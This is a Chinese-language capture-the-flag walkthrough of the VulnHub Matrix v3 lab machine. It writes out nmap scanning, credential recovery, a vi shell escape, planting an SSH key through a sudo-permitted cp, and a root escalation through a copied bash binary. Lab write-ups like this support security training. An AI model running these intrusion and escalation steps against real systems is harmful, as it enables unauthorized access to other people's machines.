一、靶场介绍
1.下载地址:https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova
2.将靶机网络适配器改为NAT模式
3.启动靶机
二、信息收集
1、主机发现
nmap -sn 192.168.111.1/24
2.扫描端口
nmap -A 192.168.111.133 -p 1-65535
3.访问页面
三、渗透流程
1.根据网页提示猜测兔子可能为线索,查看网页源代码
2.尝试url后加/Matrix
3.对目录进行爆破,发现信息
4.下载目录中的secret.gz文件,尝试解压
5.尝试以文本打开
6.对密码进行解码得:passwd
7.访问http://192.168.111.133:7331
8.输入破解的用户admin/passwd,跳转到新的页面
9.尝试对当前路径进行目录扫描,访问/data页面
10.把data文件放入IDA反汇编查看代码,得到用户名密码:guest/7R1n17yN30
11.使用ssh连接
ssh guest@192.168.111.133 -p 6464
12.连接发现指令无法执行,使用vi调用/bin/sh
13.添加环境变量并调用/bin/sh/bash
14.使用sudo -l 查看当前用户使用的命令,回显可以通过trinity用户使用/bin/cp命令
15.利用ssh-keygen生成一个密钥
16.提权并把文件放到trinity家目录下
chmod 777 .ssh
chmod 777 .ssh/id_rsa.pub
ls -al .ssh/
sudo -u trinity /bin/cp .ssh/id_rsa.pub /home/trinity/.ssh/authorized_keys
17.使用ssh连接trinity用户
ssh trinity@127.0.0.1 -i .ssh/id_rsa -p 6464
18.sudo -l发现可以调用root下文件
19.将root下文件复制到trinity目录下并提权
cp /usr/bin/bash oracle
chmod +x oracle
20.调用oracle成功获得root权限,再获取root下flag.txt
sudo ./oracle
cat flag.txt